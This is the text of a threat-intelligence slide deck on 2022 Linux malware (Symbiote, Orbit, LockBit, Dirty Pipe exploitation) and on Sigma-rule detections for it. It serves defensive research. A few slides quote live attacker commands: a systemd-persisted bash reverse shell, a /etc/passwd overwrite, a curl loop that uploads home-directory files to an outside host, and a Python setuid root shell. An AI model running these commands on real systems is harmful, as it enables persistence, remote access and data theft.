PRACTICAL CTI ANALISIS OVER 2022 ITW LINUX

IMPLANTS: DETECTION OVER BLIND SPOTS

2023/01/30

Joseliyo Sánchez – Senior Threat Researcher

Pedro Drimel – Principal Threat Researcher
 ABOUT US

Pedro Drimel Joseliyo Sánchez

Principal Threat Researcher Senior Threat Researcher

@pdrimel @Joseliyo_Jstnk

/in/pdrimel/ /in/joseluissm/

© 2022 BlackBerry. All Rights Reserved. 3

AGENDA

• Intro
• 2022 ITW Linux threats
• Similarities and detections
• Conclusions

© 2022 BlackBerry. All Rights Reserved. 4

INTRO

© 2022 BlackBerry. All Rights Reserved. 5

The community did it again

Windows Linux

https://lolbas-project.github.io https://gtfobins.github.io

© 2022 BlackBerry. All Rights Reserved. 6

 “Common” behavior in Windows infections (high level)

DOCX PWSH

EXE EXE

• There can be multiple stages

• Going to the detail, many LOLBAS are used during the infection
• Sometimes, there are CVE exploitations

© 2022 BlackBerry. All Rights Reserved. 7

“Common” behavior in Linux infections (high level)

SH
CVE Exploitation ELF

ELF SH

CVE Exploitation
Valid credentials

Lateral movement
SH

• Initial vector usually is an exploitation or lateral movement from another infected machine or valid credentials
• There can be multiple stages
• Going to the detail, many GTFOBins are used during the infection

© 2022 BlackBerry. All Rights Reserved. 8

Some of the most used

LOLBAS GTFOBins
Schtasks.exe Crontab
Wscript.exe Wget
Mshta.exe Bash
Certutil.exe Curl
Sc.exe Systemd service
Cmd.exe lwp-download

© 2022 BlackBerry. All Rights Reserved. 9

2022 ITW Linux threats

© 2022 BlackBerry. All Rights Reserved. 10

Linux threats observed during 2022

CoinMiner Symbiote Orbit

Lockbit Chaos Black Basta

Generic Generic
Trojans Downloaders

© 2022 BlackBerry. All Rights Reserved. 11

 SYMBIOTE
• Backdoor and keylogger with data exfiltration capabilities
• User-land rootkit for persistence (T1574.006)
• DNS TXT for communication protocol.
– dnscat2 used for exfiltration

© 2022 BlackBerry. All Rights Reserved. 12

 SYMBIOTE (2)
• Four victims confirmed
– Suspicious to be related with ~30mi USD in fraud
• https://www.welivesecurity.com/br/2022/03/11/operacao-anakin-pf-prende-4-suspeitos-de-invadir-
o-sistema-de-informacao-da-caixa/
• Usage of valid credentials
• LPE CVE-2016-5195 (Dirty Cow)
• Locally compiled using GCC

© 2022 BlackBerry. All Rights Reserved. 13

ORBIT

• Backdoor and keylogger

• Dropper → Payload
– Optional non-persistent using /dev/shm/ldx/

© 2022 BlackBerry. All Rights Reserved. 14

ORBIT (2)

• User-land rootkit for persistence

– /etc/ld.so.preload
– Patch loader binary with payload folder

• Python for privilege escalation using SETUID

os.setreuid(0,0)
os.execv("/bin/bash", ("/bin/bash", "-i"))

© 2022 BlackBerry. All Rights Reserved. 15

LOCKBIT

• Targets VMWare ESXi

© 2022 BlackBerry. All Rights Reserved. 16

LOCKBIT (2)

• 50K was paid to fix Linux encryptor

© 2022 BlackBerry. All Rights Reserved. 17

Downloaders, Trojans and Generics

© 2022 BlackBerry. All Rights Reserved. 18

Dirty Pipe vulnerability - CVE-2022-0847

© 2022 BlackBerry. All Rights Reserved. 19

 Dirty Pipe vulnerability - CVE-2022-0847

Fake zoom installer exploiting CVE-2022-0847

/usr/bin/su su - -c "cp /tmp/passwd.bak /etc/passwd;echo '[Unit]\nDescription=Wait

until snapd is fully loaded\n[Service]\nType=simple\nUser=root\nRestart=on-
failure\nRestartSec=5s\nExecStart=/bin/bash -c \"while [ 1 ]; do bash -i >&
/dev/tcp/10.0.2.10/9001 0>&1; done\"\n[Install]\nWantedBy=multi-user.target' >
/etc/systemd/system/snapd.loading.service;touch -t 202202230836
/etc/systemd/system/snapd.loading.service;sudo systemctl enable snapd.loading.service
--now; sudo apt update >/dev/null 2>&1; sudo apt install curl >/dev/null 2>&1; sudo
mount -o remount,rw,hidepid=2 /proc;find /home/ -not -path '*/.*' -name '*' -type f -
exec curl -s -T {} http://10.0.2.10:8000/ \\; > /dev/null; /bin/sh"

© 2022 BlackBerry. All Rights Reserved. 20

 Dirty Pipe vulnerability - CVE-2022-0847
Use of echo to create the file and after that,
start the service

/etc/systemd/system/snapd.loading.service

© 2022 BlackBerry. All Rights Reserved. 21

Dirty Pipe vulnerability - CVE-2022-0847 – Detections

3 Sigma rules created

• proc_creation_lnx_cp_passwd_tmp
• proc_creation_lnx_mount_hidepid
• proc_creation_lnx_touch_susp

© 2022 BlackBerry. All Rights Reserved. 22

 Event: ProcessCreate
Event: ProcessCreate CommandLine:
CommandLine: cp /tmp/passwd.bak /etc/passwd sudo apt install curl >/dev/null 2>&1

Event: FileCreate Event: ProcessCreate Event: ProcessCreate

Unknown Initial FileName: /etc/passwd CommandLine: CommandLine:
access touch -t 202202230836 find /home/ -not -path '*/.*' -name '*' -
/etc/systemd/system/snapd.loading.service type f -exec curl -s -T {}
http://10.0.2.10:8000/ \\

ELF cp echo touch systemctl apt mount find

File Event: ProcessCreate
CommandLine:
fake zoom file
curl -s -T
/home/joseliyo/linux_server64
Event: ProcessCreate Event: ProcessCreate http://10.0.2.10:8000/
CommandLine: CommandLine:
echo '[Unit]\nDescription=Wait until snapd is fully Event: NetworkConnect
loaded\n[Service]\nType=simple\nUser=root\nRestart=on- sudo systemctl enable snapd.loading.service --now DestinationIp: 10.0.2.10
curl
failure\nRestartSec=5s\nExecStart=/bin/bash -c \"while [ 1 ] DestinatioPort: 8000
do bash -i >& /dev/tcp/10.0.2.10/9001 0>&1
done\"\n[Install]\nWantedBy=multi-user.target' >
/etc/systemd/system/snapd.loading.Service Event: ProcessCreate
CommandLine:
Event: FileCreate sudo mount -o remount,rw,hidepid=2 /proc Other activity in the system.
FileName: /etc/systemd/system/snapd.loading.service Execution of some processes like

• Chmod
• Dpkg
High level • Apt
Rules mapped • Sort
Medium level to events • rm
during
Low level execution

Information level

(*) Click on the box of the event to see the rule

© 2022 BlackBerry. All Rights Reserved. 23

SIMILARITIES AND DETECTIONS

© 2022 BlackBerry. All Rights Reserved. 24

ORBIT

© 2022 BlackBerry. All Rights Reserved. 25

PRIORITIZE WHAT IS IMPORTANT
Techniques Chaos CoinMiner Downloaders Lockbit Orbit Symbiote Trojans Total
Security Software Discovery - T1518.001 1 1 1 1 1 1 1 7
Systemd Service - T1543.002 1 1 1 1 1 1 1 7

Drive your security in two ways System Information Discovery - T1082

Command and Scripting Interpreter - T1059
Application Layer Protocol - T1071
1
1
1
1
1
1
1
1
1
1
0
1
1
1
1
1
1
1
1
1
1
7
6
7
File and Directory Permissions Modification - T1222 1 1 1 1 1 1 1 7
Disable or Modify Tools - T1562.001 1 1 1 0 0 0 1 4
Masquerading - T1036 1 1 1 1 1 1 1 7
OS Credential Dumping - T1003 1 1 1 0 0 0 1 4

• Threat-Centric Non-Application Layer Protocol - T1095

Non-Standard Port - T1571
Ingress Tool Transfer - T1105
1
1
1
1
1
1
1
1
1
1
0
0
1
0
0
1
0
0
1
1
1
7
4
4
Unix Shell Configuration Modification - T1546.004 1 1 1 0 0 0 0 3
At (Linux) - T1053.001 1 1 1 0 0 0 1 4
Encrypted Channel - T1573 1 1 1 1 1 1 1 7
File and Directory Discovery - T1083 1 1 1 1 1 1 1 7

• Technique-Centric File Deletion - T1070.004

Process Discovery - T1057
System Network Configuration Discovery - T1016
1
0
0
1
1
1
1
1
1
1
0
0
1
0
0
1
0
0
1
0
1
7
2
3
Disable or Modify System Firewall - T1562.004 0 1 1 0 0 0 0 2
Scheduled Task/Job - T1053 0 1 1 0 0 0 0 2
Obfuscated Files or Information - T1027 0 1 0 0 0 0 1 2
Indicator Removal - T1070 0 1 1 0 0 0 0 2
Hidden Files and Directories - T1564.001 0 1 1 0 1 0 1 4
Exfiltration Over Alternative Protocol - T1048 0 1 1 0 0 0 0 2
Sudo and Sudo Caching - T1548.003 0 1 1 0 0 0 0 2
Exploitation for Defense Evasion - T1211 0 1 1 0 0 0 0 2
Remote System Discovery - T1018 0 1 1 0 0 0 1 3
Data Obfuscation - T1001 0 1 0 0 0 0 1 2
Network Service Discovery - T1046 0 1 0 0 0 0 0 1
Remote Access Software - T1219 0 1 0 0 0 0 0 1
Remote Desktop Protocol - T1021.001 0 1 0 0 0 0 0 1
Hide Artifacts - T1564 0 1 1 0 0 0 0 2
Service Stop - T1489 0 1 1 0 0 0 1 3
Data from Local System - T1005 0 0 1 0 0 0 0 1
System Owner/User Discovery - T1033 0 0 1 0 0 0 0 1
Timestomp - T1070.006 0 0 1 0 0 0 0 1
Process Injection - T1055 0 0 1 0 0 0 0 1
Proxy - T1090 0 0 0 1 0 0 1 2
Total 17 34 33 11 12 11 23

© 2022 BlackBerry. All Rights Reserved. 26

PRIORITIZE WHAT IS IMPORTANT

© 2022 BlackBerry. All Rights Reserved. 27

 Thread Activity
DirtyPipe intrusion Orbit intrusion Symbiote Intrusion DirtyPipe intrusion
1 1 2 1 Event Hypothesis Description
Reconnaissance /Actual
1 Hypothesis search for a Linux server to perform lateral
2 3 4 2
movement and exploit vulnerability CVE-
Weaponization
2022-0847

3 5 3
Delivery 5 Actual Installation of a service in the system in
order to be able to persist
4 6 7 4 5 6 Actual Exfiltration of information to a web
Exploitation application on the internal network acting as
a proxy
5 8
6 9 Actual Use of chmod to give permissions to some
Installation
files
Command & 6 9 7 8
Control

7 8 9 10 11 10 11 12 13 14 9 10 11
Actions on
objective 15 16

Victim Victim
• Data into buckets
• Help you to clustering and
Hypothesis connection
Hypothesis event
attributing
Real event Real connection

© 2022 BlackBerry. All Rights Reserved. 28

 ADVERSARY
High level – Diamond
• Cyber criminal groups
model for ITW Linux • Ransomware gangs

threats 2022

INFRASTRUCTURE
CAPABILITY
• Servers HTTP and HTTPS to distribute
• Use of utilities for Security software Discovery like ps,
payloads.
htop, top with grep for filtering. Uname and strings in
• Use of encrypted protocols to share
memory related to VM
information between server and client.
• Abuse of Systemctl to stop system services or start
services created by the malware
• Use of wget and curl to perform connections and
download files
• Use of chattr, chmod and chown for permissions
modification
VICTIM • Creation of files in suspicious folders
• Use of ls and find to discover files and directories.
• Mainly Linux servers
• Removal of artifacts and of the samples themselves

© 2022 BlackBerry. All Rights Reserved. 29

CONCLUSIONS

© 2022 BlackBerry. All Rights Reserved. 30

Conclusions

• Privilege escalation is needed, 16 LPE CVEs in 2022.

• Remote exploitation not necessarily leads to advanced attacks: Conminers exploiting CVE-2022-26134
• Usage of open-source weapons like TSH and Chaos RAT.
• Advanced backdoors used on targeted attacks like Symbiote and Orbit.
• GTFOBins can turn into a fully feature threat such as ransomware.

RECOMMENDATIONS
• System patch; for effective damage admin privilege is required.
• On the network side, look out for exfiltration coming from a Linux box.
• SUID bits are still relevant.

© 2022 BlackBerry. All Rights Reserved. 31

OUTCOMES

• https://github.com/blackberry/threat-research-and-intelligence/tree/main/Talks/2023-01-30%20-
%20SANS%20Cyber%20Threat%20Intelligence%20Summit%20%26%20Training%202023
• 5 sigma rules
– proc_creation_lnx_cp_passwd_tmp.yml
– proc_creation_lnx_mount_hidepid.yml
– proc_creation_lnx_touch_susp.yml
– proc_creation_lnx_disable_ufw.yml
– proc_creation_lnx_iptables_flush_ufw.yml
• ATT&CK MITRE Navigator layers for the samples tracked during 2022
– Orbit
– Symbiote
– Chaos
– CoinMiner
– Lockbit
– Generic Downloaders
– Generic Trojans

© 2022 BlackBerry. All Rights Reserved. 32

 @pdrimel @Joseliyo_Jstnk

/in/pdrimel/ /in/joseluissm/

Thank you
© 2022 BlackBerry Limited. Trademarks, including but not limited to BLACKBERRY and EMBLEM Design are
the trademarks or registered trademarks of BlackBerry Limited and the exclusive rights to such trademarks
are expressly reserved. All other trademarks are the property of their respective owners.

© 2022 BlackBerry. All Rights Reserved. 33

CHAOS

© 2022 BlackBerry. All Rights Reserved. 34

COINMINER

© 2022 BlackBerry. All Rights Reserved. 35

LOCKBIT

© 2022 BlackBerry. All Rights Reserved. 36

SYMBIOTE

© 2022 BlackBerry. All Rights Reserved. 37

GENERIC DOWNLOADERS

© 2022 BlackBerry. All Rights Reserved. 38

GENERIC TROJANS

© 2022 BlackBerry. All Rights Reserved. 39